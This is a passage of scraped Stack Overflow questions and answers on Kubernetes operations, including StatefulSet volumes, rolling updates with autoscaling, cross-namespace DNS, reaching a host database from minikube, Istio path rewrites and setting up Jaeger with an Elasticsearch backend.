KUBE-SEP-G5V522HWZT6RKRAC all -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */ recent: CHECK seconds: 10800 reap name: KUBE-SEP-G5V522HWZT6RKRAC side: source mask: 255.255.255.255
KUBE-SEP-G5V522HWZT6RKRAC all -- 0.0.0.0/0 0.0.0.0/0 /* default/kubernetes:https */
Chain KUBE-SVC-ZDG6MRTNE2LQFT34 (1 references)
target prot opt source destination
KUBE-SEP-O34O4OGFBAADOMEG all -- 0.0.0.0/0 0.0.0.0/0 /* default/mongodb:27017 */
</code></pre>
| <p>I remove the --network-plugin=cni flag for kubelet service and upgrade the kubernetes to 1.13.0 solve the problem</p>
|
<p>I have a k8s cluster (1 master node) that was spun up in private subnet. I want to set up an AWS load balancer in order to use <code>kubectl</code> from the internet. I tried setting up network load balancer but it didn't work. Anyone suggests me an approach to achieve that goal, please.</p>
| <p>A load balancer will not help you use <code>kubectl</code> to manage kubernetes. </p>
<p>You either need a public IP or a VPN setup within your VPC. Consider using OpenVPN to allow your kubectl running on your desktop to connect to Kubernetes.</p>
|
<p>I have deploy kubernetes cluster with stateful pod for mysql. for each pod i have different pvc.</p>
<p>for example : if 3 pod thn 3 5GB EBS PVC </p>
<p>SO Which way is better using one PVC for all pods or use different pvc for each pod.</p>
| <p>StatefulSet must use volumeClaimTemplates if you want to have dedicated storage for each pod of a set. Based on that template PersistentVolumeClaim for each pod is created and configured the volume to be bound to that claim. The generated PersistentVolumeClaims names consists of volumeClaimTemplate name + pod-name + ordinal number.
So if you add volumeClaimTemplate part to your StatefulSet YAML(and delete specific persistentVolumeClaim references), smth like that: </p>
<pre><code>volumeClaimTemplates:
- metadata:
name: mysql-data
spec:
resources:
requests:
storage: 10Gi
accessModes:
- ReadWriteOnce
</code></pre>
<p>Then go and create your StatefulSet and after to examine one of its pods (kubectl get pods pod-name-0 yaml) you’ll see smth like that(volumes part of the output):</p>
<pre><code>volumes:
- name: mysql-data
persistentVolumeClaim:
claimName: mysql-data-pod-name-0. | dynamically created claim based on the template
</code></pre>
<p>So by using volumeClaimTemplates you don’t need to create a separate PVCs yourself and then in each separate StatefulSet reference that PVC to be mounted in your container at a specific mountPath(remember that each pod of a set must reference a different PVC, 1PVC-1PV) :
Part of “containers” definition of your Statefulset YAML:</p>
<pre><code>volumeMounts:
- name: mysql-data || references your PVC by -name(not PVC name itself)
mountPath: /var/lib/mysql
</code></pre>
<p>So to aim for each pod of the set to have dedicated storage and not use volumeClaimTemplates is leading to a lot of problems and over complications to manage and scale it.</p>
|
<p>In a nutshell, most of our apps are configured with the following <code>strategy</code> in the Deployment - </p>
<pre><code> strategy:
rollingUpdate:
maxSurge: 25%
maxUnavailable: 25%
type: RollingUpdate
</code></pre>
<p>The Horizonatal Pod Autoscaler is configured as so </p>
<pre><code>spec:
maxReplicas: 10
minReplicas: 2
</code></pre>
<p>Now when our application was redeployed, instead of running a rolling update, it instantly terminated 8 of our pods and dropped the number of pods to <code>2</code> which is the min number of replicas available. This happened in a fraction of a second as you can see here.</p>
<p><a href="https://i.stack.imgur.com/V7AVN.png" rel="noreferrer"><img src="https://i.stack.imgur.com/V7AVN.png" alt="enter image description here"></a></p>
<p>Here is the output of <code>kubectl get hpa</code> - </p>
<p><a href="https://i.stack.imgur.com/ehlyV.png" rel="noreferrer"><img src="https://i.stack.imgur.com/ehlyV.png" alt="enter image description here"></a></p>
<p>As <code>maxUnavailable</code> is 25%, shouldn't only about 2-3 pods go down at max ? Why did so many pods crash at once ? It seems as though rolling update is useless if it works this way.</p>
<p>What am I missing ?</p>
| <p>After looking at this question, I decided to try this with test Environment where I wanted to check If it doesn't work.</p>
<p>I have setup the <code>metrics-server</code> to fetch the metrics server and set a HPA. I have followed the following steps to setup the HPA and deployment:</p>
<p><a href="https://stackoverflow.com/questions/53725248/how-to-enable-kubeapi-server-for-hpa-autoscaling-metrics/53727101#53727101">How to Enable KubeAPI server for HPA Autoscaling Metrics</a></p>
<p>Once, I have working HPA and max <code>10 pods</code> running on system, I have updated the images using:</p>
<pre><code>[root@ip-10-0-1-176 ~]# kubectl get hpa
NAME REFERENCE TARGETS MINPODS MAXPODS REPLICAS AGE
php-apache Deployment/php-apache 49%/50% 1 10 10 87m
[root@ip-10-0-1-176 ~]# kubectl get pods
NAME READY STATUS RESTARTS AGE
load-generator-557649ddcd-6jlnl 1/1 Running 0 61m
php-apache-75bf8f859d-22xvv 1/1 Running 0 91s
php-apache-75bf8f859d-dv5xg 1/1 Running 0 106s
php-apache-75bf8f859d-g4zgb 1/1 Running 0 106s
php-apache-75bf8f859d-hv2xk 1/1 Running 0 2m16s
php-apache-75bf8f859d-jkctt 1/1 Running 0 2m46s
php-apache-75bf8f859d-nlrzs 1/1 Running 0 2m46s
php-apache-75bf8f859d-ptg5k 1/1 Running 0 106s
php-apache-75bf8f859d-sbctw 1/1 Running 0 91s
php-apache-75bf8f859d-tkjhb 1/1 Running 0 55m
php-apache-75bf8f859d-wv5nc 1/1 Running 0 106s
[root@ip-10-0-1-176 ~]# kubectl set image deployment php-apache php-apache=hpa-example:v1 --record
deployment.extensions/php-apache image updated
[root@ip-10-0-1-176 ~]# kubectl get pods
NAME READY STATUS RESTARTS AGE
load-generator-557649ddcd-6jlnl 1/1 Running 0 62m
php-apache-75bf8f859d-dv5xg 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-g4zgb 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-hv2xk 1/1 Terminating 0 3m10s
php-apache-75bf8f859d-jkctt 1/1 Running 0 3m40s
php-apache-75bf8f859d-nlrzs 1/1 Running 0 3m40s
php-apache-75bf8f859d-ptg5k 1/1 Terminating 0 2m40s
php-apache-75bf8f859d-sbctw 0/1 Terminating 0 2m25s
php-apache-75bf8f859d-tkjhb 1/1 Running 0 56m
php-apache-75bf8f859d-wv5nc 1/1 Terminating 0 2m40s
php-apache-847c8ff9f4-7cbds 1/1 Running 0 6s
php-apache-847c8ff9f4-7vh69 1/1 Running 0 6s
php-apache-847c8ff9f4-9hdz4 1/1 Running 0 6s
php-apache-847c8ff9f4-dlltb 0/1 ContainerCreating 0 3s
php-apache-847c8ff9f4-nwcn6 1/1 Running 0 6s
php-apache-847c8ff9f4-p8c54 1/1 Running 0 6s
php-apache-847c8ff9f4-pg8h8 0/1 Pending 0 3s
php-apache-847c8ff9f4-pqzjw 0/1 Pending 0 2s
php-apache-847c8ff9f4-q8j4d 0/1 ContainerCreating 0 4s
php-apache-847c8ff9f4-xpbzl 0/1 Pending 0 1s
</code></pre>
<p>Also, I have kept job in background which pushed the <code>kubectl get pods</code> output every second in a file. At no time till all images are upgraded, number of pods never went below 8. </p>
<p>I believe you need to check how you're setting up your rolling upgrade. Are you using deployment or replicaset? I have kept the <code>rolling update</code> strategy same as you <code>maxUnavailable: 25%</code> and <code>maxSurge: 25%</code> with deployment and it is working well for me.</p>
|
<p>I am new to kubernetes. Basically,I am trying to add windows node to cluster(contains linux node). My host machine is linux. For now, i am trying to add only 1 windows node but in future it should work for multiple windows nodes). <strong>while joining windows node to the kubernetes cluster using kubeadm</strong> it's throwing error message, </p>
<p>As it is trying to execute "kubeadm join.." on windows node, i am trying to install kubeadm on windows machine. but no luck.</p>
<p>it's throwing error as </p>
<pre><code>"fatal: [windows]: FAILED! => {
"changed": true,
"cmd": "kubeadm join <IP>:<port> --token <jdhsjhsjdhsd> --discovery-token-ca-cert-hash sha256:<somekey> --node-name <kubernetes_node_hostname>",
"delta": "0:00:00.732545",
"end": "2018-12-27 07:39:26.496097",
"msg": "non-zero return code",
"rc": 1,
"start": "2018-12-27 07:39:25.763552",
"stderr": "kubeadm : The term 'kubeadm' is not recognized as the name of a cmdlet, function, script file, or operable program. \r\nCheck the spelling of the name, or if a path was included, verify that the path is correct and try again.\r\nAt line:1 char:65\r\n+ ... :InputEncoding = New-Object Text.UTF8Encoding $false;"
</code></pre>
| <p>You can download all the various binaries from links in the Changelog for each release. <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#downloads-for-v1131" rel="nofollow noreferrer">https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#downloads-for-v1131</a> is the latest 1.13 as this writing.</p>
<p><a href="https://dl.k8s.io/v1.13.1/kubernetes-node-windows-amd64.tar.gz" rel="nofollow noreferrer">https://dl.k8s.io/v1.13.1/kubernetes-node-windows-amd64.tar.gz</a> are the node binaries in particular which includes Kubeadm as well as other things needed to run a node.</p>
|
<p>I previously created a Flask server that spawns Docker containers using the Docker Python SDK. When a client hits a specific endpoint, the server would generate a container. It would maintain queues, and it would be able to kill containers that didn't respond to requests. </p>
<p>I want to migrate towards Kubernetes, but I am starting to think my current server won't be able to "spawn" jobs as pods automatically like in docker. </p>
<pre><code>docker.from_env().containers.run('alpine', 'echo hello world')
</code></pre>
<p>Is Docker Swarm a better solution for this, or is there a hidden practice that is done in Kubernetes? Would the Kubernetes Python API be a logical solution for automatically generating pods and jobs, where the Flask server is a pod that manages other pods within the cluster? </p>
| <p>'Kubectl run' is much like 'docker run' in that it will create a Pod with a container based on a docker image (e.g. <a href="https://stackoverflow.com/questions/34601650/how-do-i-run-curl-command-from-within-a-kubernetes-pod">How do i run curl command from within a Kubernetes pod</a>). See <a href="https://kubernetes.io/docs/reference/kubectl/docker-cli-to-kubectl/" rel="nofollow noreferrer">https://kubernetes.io/docs/reference/kubectl/docker-cli-to-kubectl/</a> for more comparison. But what you run with k8s are Pods/Jobs that contain containers rather than running containers directly so this will add an extra layer of complexity for you.</p>
<p>Kubernetes is more about orchestrating services rather than running short-lived jobs. It has some features and can be used to run jobs but that isn't its central focus. If you're going in that direction you may want to look at knative (and knative build) or kubeless as what you describe sounds rather like the serverless concept. Or if you are thinking more about Jobs then perhaps brigade (<a href="https://brigade.sh" rel="nofollow noreferrer">https://brigade.sh</a>). (For more see <a href="https://www.quora.com/Is-Kubernetes-suited-for-long-running-batch-jobs" rel="nofollow noreferrer">https://www.quora.com/Is-Kubernetes-suited-for-long-running-batch-jobs</a>) If you are looking to run web app workloads that serve requests then note that you don't need to kill containers that fail to respond on k8s as k8s will monitor and restart them for you. </p>
<p>I don't know swarm well enough to compare. I suspect it would be a bit easier for you as it is aimed more centrally at docker (the k8s API is intended to support other runtimes) but perhaps somebody else can comment on that. Whether using swarm instead helps you will I guess depend on your motivations. </p>
|
<p>I have a repo for maintaining multiple locust scripts to load test many of my target-hosts/services. </p>
<p>How to integrate these scripts into the helm installation of stable/locust on one of k8s cluster?</p>
<p>We currently run locust master and slave manually on different ec2 instances and perform load tests on that.</p>
<p>We want to setup locust on k8s. This is in preliminary stages.</p>
| <p>There is an outstanding issue with that chart at the moment that it doesn't provide a clear way to inject scripts. You currently have to effectively add them yourself to the docker image or create your own copy of the chart. This could be made more flexible and there is aspiration to do so - see <a href="https://github.com/helm/charts/issues/2560" rel="nofollow noreferrer">https://github.com/helm/charts/issues/2560</a></p>
|
<p>I'd like to run several stateful applications (such as MongoDB, Kafka, etc.). All of them recommend using XFS as file system, however I don't know how I can ensure the creation of a XFS file system in Google's Kubernetes Engine / Google Cloud Compute Engine.</p>
<p>I usually deploy my applications with a helm chart and I couldn't find any hints that it would take care of the XFS filesystem for me either.</p>
<p><strong>Question:</strong></p>
<p>Can someone explain me how I can ensure the creation of XFS volumes in GKE / GCE / Kubernetes?</p>
| <p>At the moment using XFS as file system on Google's Kubernetes Engine is not supported, but there is a <a href="https://issuetracker.google.com/62613829" rel="nofollow noreferrer">feature request</a> to enable Support XFS on Container-Optimized OS (when choosing COS).
Therefore, you can choose Ubuntu node image for your XFS needs, check this <a href="https://medium.com/@allanlei/mounting-xfs-on-gke-adcf9bd0f212" rel="nofollow noreferrer">link</a>.</p>
|
<p>I want to route 70% percentage of my traffic coming to service A to an external end point and append the URL.</p>
<p>To achieve this I created an externalName type service which points to external endpoint and then use treafik ingress controller to divide the weight in percentage.</p>
<p>My service definition looks something like this: </p>
<pre><code> ---
apiVersion: v1
kind: Service
metadata:
name: wensleydale
spec:
ports:
- name: http
targetPort: 80
port: 80
selector:
app: cheese
task: wensleydale
---
kind: Service
apiVersion: v1
metadata:
name: test-service
spec:
type: ExternalName
externalName: www.google.com
ports:
- name: http
targetPort: 80
port: 80
selector:
app: cheese
task: test-service
</code></pre>
<p>Ingress.yaml:</p>
<pre><code> apiVersion: extensions/v1beta1
kind: Ingress
metadata:
annotations:
traefik.ingress.kubernetes.io/service-weights: |
test-service: 70%
wensleydale: 30%
name: cheese
spec:
rules:
- http:
paths:
- backend:
serviceName: test-service
servicePort: 80
path: /
- backend:
serviceName: wensleydale
servicePort: 80
path: /
</code></pre>
<p>What I want in addition is when traffic goes to <code>test-service</code>, I want to append path.<br>
In my <code>test-service</code> I want the URL to be something like <code>www.google.com/something</code> </p>
<p>I'm open to use other tools to achieve this. </p>
| <p>You can do the following:</p>
<ol>
<li><p>Use Istio Ingress Gateway instead of a traefik gateway. Istio Ingress Gateway is the recommended way for Ingress control in Istio. See <a href="https://istio.io/docs/tasks/traffic-management/ingress/" rel="nofollow noreferrer">https://istio.io/docs/tasks/traffic-management/ingress/</a></p></li>
<li><p>In the corresponding Virtual Service, use HTTPRewrite directive <a href="https://istio.io/docs/reference/config/istio.networking.v1alpha3/#HTTPRewrite" rel="nofollow noreferrer">https://istio.io/docs/reference/config/istio.networking.v1alpha3/#HTTPRewrite</a> :</p></li>
</ol>
<p><code>
rewrite:
uri: /something
</code></p>
|
<p>I am having an issue with Kubernetes on GKE. I am unable to resolve services by name. I got an <code>drone-server</code> service running which is connected to a single pod. The ingress connected to the service is successfully connecting but when trying to do for example a <code>nslookup</code> from a <code>busybox</code> pod is it unable to resolve the hostname.</p>
<p><strong>Services:</strong></p>
<pre><code>$ k get services -n drone
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
drone-server ClusterIP 10.39.242.23 <none> 80/TCP 2d
drone-vault ClusterIP 10.39.248.166 <none> 80/TCP 40m
</code></pre>
<p><strong>Busybox nslookup:</strong></p>
<pre><code>$ kubectl exec -ti busybox -- nslookup drone-server
Server: 10.39.240.10
Address 1: 10.39.240.10 kube-dns.kube-system.svc.cluster.local
nslookup: can't resolve 'drone-server'
</code></pre>
<p>When i try to lookup <code>kubernetes.default</code> am I getting a local address back:</p>
<pre><code>$ kubectl exec -ti busybox -- nslookup kubernetes.default
Server: 10.39.240.10
Address 1: 10.39.240.10 kube-dns.kube-system.svc.cluster.local
Name: kubernetes.default
Address 1: 10.39.240.1 kubernetes.default.svc.cluster.local
</code></pre>
<p><strong>Resolv config:</strong></p>
<p><code>/etc/resolv.conf</code> seems to be configured correctly (the nameserver is matching the kube-dns service cluster ip).</p>
<pre><code>$ kubectl exec -ti busybox -- cat /etc/resolv.conf
nameserver 10.39.240.10
search default.svc.cluster.local svc.cluster.local cluster.local europe-west3-a.c.cluster-a8e6d9e252b63e03.internal c.cluster-a8e6d9e252b63e03.internal google.internal
options ndots:5
</code></pre>
| <p>Your <code>drone-server</code> service is in the <code>drone</code> namespace and you're trying to nslookup from default namespace. You need to provide the namespace also in command as follows:</p>
<pre><code>kubectl exec -ti busybox -- nslookup drone-server.drone
</code></pre>
<p>This is because your busybox in the default namespace and it tries to look drone-server in same namespace.</p>
|
<p>I am trying to deploy an asp.net core 2.2 application in Kubernetes. This application is a simple web page that need an access to an SQL Server database to display some information. This database is hosted on my local development computer (localhost) and the web application is deployed in a minikube cluster to simulate the production environment where my web application could be deployed in a cloud and access a remote database. </p>
<p>I managed to display my web application by exposing port 80. However, I can't figure out how to make my web application connect to my SQL Server database hosted on my local computer from inside the cluster.</p>
<p>I assume that my connection string is correct since my web application can connect to the SQL Server database when I deploy it on an IIS local server, in a docker container (docker run) or a docker service (docker create service) but not when it is deployed in a Kubernetes cluster. I understand that the cluster is in a different network so I tried to create a service without selector as described in <a href="https://stackoverflow.com/questions/43354167/minikube-expose-mysql-running-on-localhost-as-service">this question</a>, but no luck... I even tried to change the connection string IP address to match the one of the created service but it failed too. </p>
<p>My firewall is setup to accept inbound connection to 1433 port.</p>
<p>My SQL Server database is configured to allow remote access.</p>
<p>Here is the connection string I use:</p>
<pre><code>"Server=172.24.144.1\\MyServer,1433;Database=TestWebapp;User Id=user_name;Password=********;"
</code></pre>
<p>And here is the file I use to deploy my web application:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: webapp
spec:
replicas: 1
template:
metadata:
labels:
app: webapp
spec:
containers:
- name: webapp
image: <private_repo_url>/webapp:db
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
- containerPort: 1433
imagePullSecrets:
- name: gitlab-auth
volumes:
- name: secrets
secret:
secretName: auth-secrets
---
apiVersion: v1
kind: Service
metadata:
name: webapp
labels:
app: webapp
spec:
type: NodePort
selector:
app: webapp
ports:
- name: port-80
port: 80
targetPort: 80
nodePort: 30080
- name: port-443
port: 443
targetPort: 443
nodePort: 30443
---
apiVersion: v1
kind: Service
metadata:
name: sql-server
labels:
app: webapp
spec:
ports:
- name: port-1433
port: 1433
targetPort: 1433
---
apiVersion: v1
kind: Endpoints
metadata:
name: sql-server
labels:
app: webapp
subsets:
- addresses:
- ip: 172.24.144.1 <-- IP of my local computer where SQL Server is running
ports:
- port: 1433
</code></pre>
<p>So I get a deployment named 'webapp' with only one pod, two services named 'webapp' and 'sql-server' and two endpoints also named 'webapp' and 'sql-server'. Here are their details:</p>
<pre><code>> kubectl describe svc webapp
Name: webapp
Namespace: default
Labels: app=webapp
Annotations: <none>
Selector: app=webapp
Type: NodePort
IP: 10.108.225.112
Port: port-80 80/TCP
TargetPort: 80/TCP
NodePort: port-80 30080/TCP
Endpoints: 172.17.0.4:80
Port: port-443 443/TCP
TargetPort: 443/TCP
NodePort: port-443 30443/TCP
Endpoints: 172.17.0.4:443
Session Affinity: None
External Traffic Policy: Cluster
Events: <none>
> kubectl describe svc sql-server
Name: sql-server
Namespace: default
Labels: app=webapp
Annotations: <none>
Selector: <none>
Type: ClusterIP
IP: 10.107.142.32
Port: port-1433 1433/TCP
TargetPort: 1433/TCP
Endpoints:
Session Affinity: None
Events: <none>
> kubectl describe endpoints webapp
Name: webapp
Namespace: default
Labels: app=webapp
Annotations: <none>
Subsets:
Addresses: 172.17.0.4
NotReadyAddresses: <none>
Ports:
Name Port Protocol
---- ---- --------
port-443 443 TCP
port-80 80 TCP
Events: <none>
> kubectl describe endpoints sql-server
Name: sql-server
Namespace: default
Labels: app=webapp
Annotations: <none>
Subsets:
Addresses: 172.24.144.1
NotReadyAddresses: <none>
Ports:
Name Port Protocol
---- ---- --------
<unset> 1433 TCP
Events: <none>
</code></pre>
<p>I am expecting to connect to the SQL Server database but when my application is trying to open the connection I get this error:</p>
<blockquote>
<p>SqlException: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: TCP Provider, error: 40 - Could not open a connection to SQL Server)</p>
</blockquote>
<p>I am new with Kubernetes and I am not very comfortable with networking so any help is welcome.
The best help would be to give me some advices/tools to debug this since I don't even know where or when the connection attempt is blocked...</p>
<p>Thank you!</p>
| <p>What you consider the IP address of your host is a private IP for an internal network. It is possible that this IP address is the one that your machine uses on the "real" network you are using. The kubernetes virtual network is on a different subnet and thus - the IP that you use internally is not accessible.</p>
<pre><code>subsets:
- addresses:
- ip: 172.24.144.1 <-- IP of my local computer where SQL Server is running
ports:
- port: 1433
</code></pre>
<p>You can connect via the DNS entry <em>host.docker.internal</em>
Read more <a href="https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds" rel="noreferrer">here</a> and <a href="https://docs.docker.com/docker-for-windows/networking/#known-limitations-use-cases-and-workarounds" rel="noreferrer">here for windows</a></p>
<p>I am not certain if that works in minicube - there used to be a different DNS name for linux/windows implementations for the host. </p>
<p>If you want to use the IP (bear in mind it would change eventually), you can probably track it down and ensure it is the one "visible" from withing the virtual subnet.</p>
<p>PS : I am using the kubernetes that go on with docker now, seems easier to work with. </p>
|
<p>I am running a Kubernetes cluster with 3 master and 3 nodes.</p>
<p>I have found this to auto-scale worker nodes based on the pod's status.
<a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider/aws" rel="nofollow noreferrer">https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider/aws</a></p>
<p>But, I couldn't find any blog or add-on to auto-scale master nodes.</p>
<p>Is there any reason to auto-scale master nodes, if yes how can we do that?</p>
| <p>There is no need to <code>autoscale</code> the master nodes. In a practical world, your worker nodes responsibility is to run your work load and your master nodes responsibility is to make sure that your worker nodes are having desired state in the cluster.</p>
<p>Now all the end users will request your application (pods) and as the load increased they need to scale horizontally and more pods should be spawned. If the resources on worker nodes are insufficient to run those nodes, more worker nodes should be spawned.</p>
<p>In large cluster we do not run load on master node, but we need to make sure it is highly available so that there is no single point of failure to orchestrate the worker nodes. For that we can have 3 master multi-master cluster in place.</p>
<p>Worker nodes we worry about the <code>horizontal scalability</code> and In master node we worry about <code>high availability</code>.</p>
<p>But for building large cluster, you need to provide adequate resources to master nodes for handling the orchestration of load on worker nodes.</p>
<p>For more information on building large cluster, please refer official document:</p>
<p><a href="https://kubernetes.io/docs/setup/cluster-large/" rel="nofollow noreferrer">https://kubernetes.io/docs/setup/cluster-large/</a></p>
<p>In a nutshell, You can even have one master for 1000 worker nodes if you provide enough resources to that node. So, there is no reason to autoscale master comparing to the challenges we face in doing so. </p>
|
<p>I'd like to run Windows containers in GKE.
Is it possible to use Windows Server Containers OS in Google Kubernetes Engine?</p>
<p>I see Windows Server Containers OS is available in Compute Engine and seems that Kubernetes support is <a href="https://kubernetes.io/blog/2018/01/kubernetes-v19-beta-windows-support/" rel="noreferrer">available</a> for Windows.</p>
| <p>It is possible to run Windows containers, but only as a container in a Compute Engine VM instance.
I would refer you to <a href="https://cloud.google.com/blog/products/gcp/how-to-run-windows-containers-on-compute-engine" rel="nofollow noreferrer">this article</a> in the GCP blog. Please be aware that there a few <a href="https://cloud.google.com/compute/docs/containers/#windows_known_issues" rel="nofollow noreferrer">known issues</a> that you should read before deploying Windows containers in Windows VM instances. </p>
<p>For GKE, there is currently a <a href="https://issuetracker.google.com/110213558" rel="nofollow noreferrer">Feature Request</a>. Other customers have asked to include future support for Windows containers in GKE. This is a request through official means. Google will consider the need based on its feasibility, or the number of customers who ask for it, but they can't guarantee an implementation or provide you with an ETA for it.</p>
|
<p>I want to create Kubernetes cluster with Terraform,</p>
<p>Regarding the doc page here: <a href="https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html" rel="nofollow noreferrer">https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html</a></p>
<pre><code>variable "name" {
default = "my-first-k8s"
}
data "alicloud_zones" main {
available_resource_creation = "VSwitch"
}
data "alicloud_instance_types" "default" {
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
cpu_core_count = 1
memory_size = 2
}
</code></pre>
<p>Where do I insert vswitch id? and how to set the region id?</p>
| <p>You can insert the vswitch id in the <code>resource</code> definition:</p>
<pre><code>resource "alicloud_cs_managed_kubernetes" "k8s" {
name = "${var.name}"
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
new_nat_gateway = true
worker_instance_types = ["${data.alicloud_instance_types.default.instance_types.0.id}"]
worker_numbers = [2]
password = "Test12345"
pod_cidr = "172.20.0.0/16"
service_cidr = "172.21.0.0/20"
install_cloud_monitor = true
worker_disk_category = "cloud_efficiency"
vswitch_ids = ["your-alibaba-vswitch-id"]
}
</code></pre>
<p>For the zones (if you want to override the defaults) based on <a href="https://github.com/terraform-providers/terraform-provider-alicloud/blob/master/alicloud/data_source_alicloud_zones.go#L83" rel="nofollow noreferrer">this</a> and the <a href="https://www.terraform.io/docs/providers/alicloud/d/zones.html" rel="nofollow noreferrer">docs</a>, you need to do something like this:</p>
<pre><code>data "alicloud_zones" main {
available_resource_creation = "VSwitch"
zones = [
{
id = "..."
local_name = "..."
...
},
{
id = "..."
local_name = "..."
...
},
...
]
}
</code></pre>
|
<p>I have a kubernetes cluster on google cloud platform, and on it, I have a jaeger deployment via development setup of <a href="https://github.com/jaegertracing/jaeger-kubernetes#development-setup" rel="nofollow noreferrer">jaeger-kubernetes templates</a>
because my purpose is setup <code>elasticsearch</code> like backend storage, due to this, I follow the jaeger-kubernetes github documentation with the following actions</p>
<ul>
<li>I've created the services via <a href="https://github.com/jaegertracing/jaeger-kubernetes#production-setup" rel="nofollow noreferrer">production setup</a> options</li>
</ul>
<p>Here are configured the URLs to access to <code>elasticsearch</code> server and username and password and ports</p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/production-elasticsearch/configmap.yml
</code></pre>
<p>And here, there are configured the download of docker images of the elasticsearch service and their volume mounts. </p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/production-elasticsearch/elasticsearch.yml
</code></pre>
<p>And then, at this moment we have a elasticsearch service running over 9200 and 9300 ports</p>
<pre><code> kubectl get service elasticsearch [a89fbe2]
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
elasticsearch ClusterIP None <none> 9200/TCP,9300/TCP 1h
</code></pre>
<ul>
<li>I've follow with the creation of jaeger components using the <code>kubernetes-jaeger</code> <a href="https://github.com/jaegertracing/jaeger-kubernetes#jaeger-components" rel="nofollow noreferrer">production templates</a> of this way:</li>
</ul>
<hr>
<pre><code>λ bgarcial [~] → kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/jaeger-production-template.yml
deployment.extensions/jaeger-collector created
service/jaeger-collector created
service/zipkin created
deployment.extensions/jaeger-query created
service/jaeger-query created
daemonset.extensions/jaeger-agent created
λ bgarcial [~/workspace/jaeger-elastic] at master ?
</code></pre>
<p>According to the <a href="https://eng.uber.com/wp-content/uploads/2017/02/Distributed_Tracing_Header.png" rel="nofollow noreferrer">Jaeger architecture</a>, the <code>jaeger-collector</code> and <code>jaeger-query</code> services require access to backend storage. </p>
<p>And so, these are my services running on my kubernetes cluster:</p>
<pre><code>λ bgarcial [~/workspace/jaeger-elastic] at master ?
→ kubectl get services [baefdf9]
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
elasticsearch ClusterIP None <none> 9200/TCP,9300/TCP 3h
jaeger-collector ClusterIP 10.55.253.240 <none> 14267/TCP,14268/TCP,9411/TCP 3h
jaeger-query LoadBalancer 10.55.248.243 35.228.179.167 80:30398/TCP 3h
kubernetes ClusterIP 10.55.240.1 <none> 443/TCP 3h
zipkin ClusterIP 10.55.240.60 <none> 9411/TCP 3h
λ bgarcial [~/workspace/jaeger-elastic] at master ?
</code></pre>
<ul>
<li>I going to <code>configmap.yml</code> elastic search file <code>kubectl edit configmap jaeger-configuration</code> command in order to try to edit it in relation to the elasticsearch URLs endpoints (may be? ... At this moment I am supossing that this is the next step ...)</li>
</ul>
<p>I execute it:</p>
<pre><code>λ bgarcial [~] → kubectl edit configmap jaeger-configuration
</code></pre>
<p>And I get the following edit entry:</p>
<pre><code> apiVersion: v1
data:
agent: |
collector:
host-port: "jaeger-collector:14267"
collector: |
es:
server-urls: http://elasticsearch:9200
username: elastic
password: changeme
collector:
zipkin:
http-port: 9411
query: |
es:
server-urls: http://elasticsearch:9200
username: elastic
password: changeme
span-storage-type: elasticsearch
kind: ConfigMap
metadata:
creationTimestamp: "2018-12-27T13:24:11Z"
labels:
app: jaeger
jaeger-infra: configuration
name: jaeger-configuration
namespace: default
resourceVersion: "1387"
selfLink: /api/v1/namespaces/default/configmaps/jaeger-configuration
uid: b28eb5f4-09da-11e9-9f1e-42010aa60002
</code></pre>
<p>Here ... do I need setup our own URLs to collector and query services, which will be connect wiht elasticsearch backend service?</p>
<p>How to can I setup the elasticsearch IP address or URLs here?</p>
<p>In the jaeger components, the query and collector need access to storage, but I don't know what is the elastic endpoint ... </p>
<p>Is this <code>server-urls: http://elasticsearch:9200</code> a correct endpoint?</p>
<p>I am starting in the kubernetes and DevOps world, and I appreciate if someone can help me in the concepts and point me in the right address in order to setup jaeger and elasticsearch as a backend storage.</p>
| <p>When you are accessing the service from the pod in the <strong>same namespace</strong> you can use just the service name.
Example:</p>
<pre><code>http://elasticsearch:9200
</code></pre>
<p>If you are accessing the service from the pod in the <strong>different namespace</strong> you should also specify the namespace.
Example: </p>
<pre><code>http://elasticsearch.mynamespace:9200
http://elasticsearch.mynamespace.svc.cluster.local:9200
</code></pre>
<p>To check in what namespace the service is located, use the following command:</p>
<pre><code>kubectl get svc --all-namespaces -o wide
</code></pre>
<p><strong>Note</strong>: Changing ConfigMap does not apply it to deployment instantly. Usually, you need to restart all pods in the deployment to apply new ConfigMap values. There is no rolling-restart functionality at the moment, but you can use the following command as a workaround:<br>
<em>(replace deployment name and pod name with the real ones)</em></p>
<pre><code>kubectl patch deployment mydeployment -p '{"spec":{"template":{"spec":{"containers":[{"name":"my-pod-name","env":[{"name":"START_TIME","value":"'$(date +%s)'"}]}]}}}}'
</code></pre>
|
<p>I want to optimally configure the CPU cores without over or under allocation. How can I measure the required CPU millicore for a given container? It also brings the question of how much traffic a proxy will send it to any given pod based on CPU consumption so we can optimally use the compute.</p>
<p>Currently I send requests and monitor with,</p>
<pre><code>kubectl top pod
</code></pre>
<p>Is there any tool that can measure, Requests, CPU and Memory over the time and suggest the optimal CPU recommendation for the pods.</p>
